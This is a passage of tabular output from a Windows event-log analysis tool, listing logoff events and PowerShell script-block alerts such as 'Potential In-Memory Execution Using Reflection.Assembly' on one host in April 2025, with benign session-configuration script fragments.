&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1001   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x459ea'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:47:33 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 593       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: UMFD-1           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-96-0-1      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Font Driver    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Host                             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x9d9d'          &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:47:35 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 604       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: DWM-1            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-1      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xf553'          &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:47:35 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 605       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: DWM-1            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-1      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xf52b'          &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:48:21 &#9474; &#8227; Potential In-Memory Execution     &#9474; 1     &#9474; Microsoft-Windows-PowerShell   &#9474; 4104     &#9474; 5         &#9474; DESKTOP-8IRBDLK &#9474; MessageNumber: 1                 &#9474;
&#9474;                     &#9474; Using Reflection.Assembly           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptBlockText: "\r\nfunction   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;  ExtractPluginProperties([stri   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ng]$pluginDir, $objectToWriteT   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; o) \r\n{\r\n  function Unescap   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; e-Xml($s) {\r\n    if ($s) {\r   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; \n      $s = $s.Replace(\"&amp;lt;   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; \", \"&lt;\");\r\n      $s = $s.R   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; eplace(\"&amp;gt;\", \"&gt;\");\r\n     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;     $s = $s.Replace(\"&amp;quot;\"   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; , '\"');\r\n      $s = $s.Repl   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ace(\"&amp;apos;\", \"'\");\r\n      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;    $s = $s.Replace(\"&amp;#39;\",    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; \"'\");\r\n      $s = $s.Repla   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ce(\"&amp;amp;\", \"&amp;\");\r\n    }   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;     \r\n    return $s;\r\n  }\   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; r\n\r\n  # The default compare   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ...                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; (use --full to show all content) &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptBlockId: 9ee4b956-2adb-4   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 41b-98cc-8db98f309b59            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; MessageTotal: 1                  &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Path: ''                         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:48:30 &#9474; &#8227; Powershell File and Directory     &#9474; 1     &#9474; Microsoft-Windows-PowerShell   &#9474; 4104     &#9474; 6         &#9474; DESKTOP-8IRBDLK &#9474; MessageNumber: 1                 &#9474;
&#9474;                     &#9474; Discovery                           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptBlockText: "\r\nfunction   &#9474;
&#9474;                     &#9474; &#8227; Use Of Remove-Item to             &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;  Set-PSSessionConfiguration([P   &#9474;
&#9474;                     &#9474; Delete File - ScriptBlock           &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SObject]$customShellObject, \r   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; \n   [Array]$initParametersMap   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ,\r\n   [bool]$force,\r\n   [s   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; tring]$sddl,\r\n   [bool]$isSd   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; dlSpecified,\r\n   [bool]$shou   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ldShowUI,\r\n   [string]$resou   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; rceUri,\r\n   [string]$pluginN   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; otFoundErrorMsg,\r\n   [string   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ]$pluginNotPowerShellMsg,\r\n    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474;   [System.Management.Automatio   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; n.Runspaces.PSSessionConfigura   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; tionAccessMode]$accessMode\r\n   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; )\r\n{\r\n  $wsmanPluginDir =    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 'WSMan:\\localhost\\Plugin'\r\   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ...                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; (use --full to show all content) &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ScriptBlockId: 75e2b00c-602d-4   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 70e-8547-d26cf5fc3465            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; MessageTotal: 1                  &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Path: ''                         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:48:55 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 662       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2673cd'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:09 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 679       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x28efb2'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:14 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 700       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x285209'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&